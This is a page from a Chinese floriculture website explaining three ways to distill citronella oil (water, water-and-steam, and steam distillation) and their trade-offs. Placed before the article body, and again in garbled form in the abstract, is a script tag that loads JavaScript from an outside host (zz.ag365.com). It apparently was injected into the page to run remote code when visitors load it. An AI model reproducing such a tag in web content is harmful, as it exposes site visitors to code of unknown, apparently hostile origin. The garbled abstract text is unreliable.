您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

香茅加工蒸馏方法

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=4164"/gt;香茅加工蒸馏方法有下列三种: 1. 水中蒸馏:又称水煮法或泡蒸法。将香茅叶放入蒸馏器中蒸馏,将香茅油蒸馏出来。锅中加水量,使原料全部投入水中即可。优点是设备简单,费用低,搬动容易
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=4164"></Script>    香茅加工蒸馏方法有下列三种:
    
    1. 水中蒸馏:又称水煮法或泡蒸法。将香茅叶放入蒸馏器中蒸馏,将香茅油蒸馏出来。锅中加水量,使原料全部投入水中即可。优点是设备简单,费用低,搬动容易。缺点是:一部分不易蒸出。有些易变的物质如醛类易引起缩合作用,从而降低出油率、油质差。蒸馏时间长达5~6小时,消耗燃料多,一般生产上已很少采用水中蒸馏。
    
    2. 水上蒸馏:是生产上常用的一种方法,又称常压蒸汽蒸馏。在上述蒸馏器中加一隔板(假底),使原料与水分开,利用蒸馏器本身产生的蒸汽进行蒸馏。蒸汽永远是饱和的湿蒸汽,而不可能成为过热蒸汽,植物原料只与蒸汽接触而不与沸水接触。采用此法需注意保持锅内一定水量,防止设备漏气。优点是:设备简单,费用低,移动方便,还可以减少香茅油的水解,出油率也较水中蒸馏法为高。缺点是:对于某些沸点较高的成分,用水上蒸馏的常压蒸汽不易将其蒸出。
    
    3. 蒸汽蒸馏:蒸馏香茅油的对蒸汽另由蒸汽锅炉发生,用蒸汽导管导入蒸甑的底部蒸出精油,称为蒸汽蒸馏。可以用常压锅炉供应的蒸汽进行蒸馏,有一定压力,称高压蒸馏。由于蒸汽运动速度大,温度高,可以加速蒸馏速度。一般每蒸一次只需2.5~3.5小时,香茅油中沸点较高的组分易于蒸出。优点是:一般设有2~4个蒸甑,可以昼夜不停的轮流蒸馏,出油率高,燃料消耗少。缺点是:设备费用高,移动不便,只适宜于固定的较大规模的生产。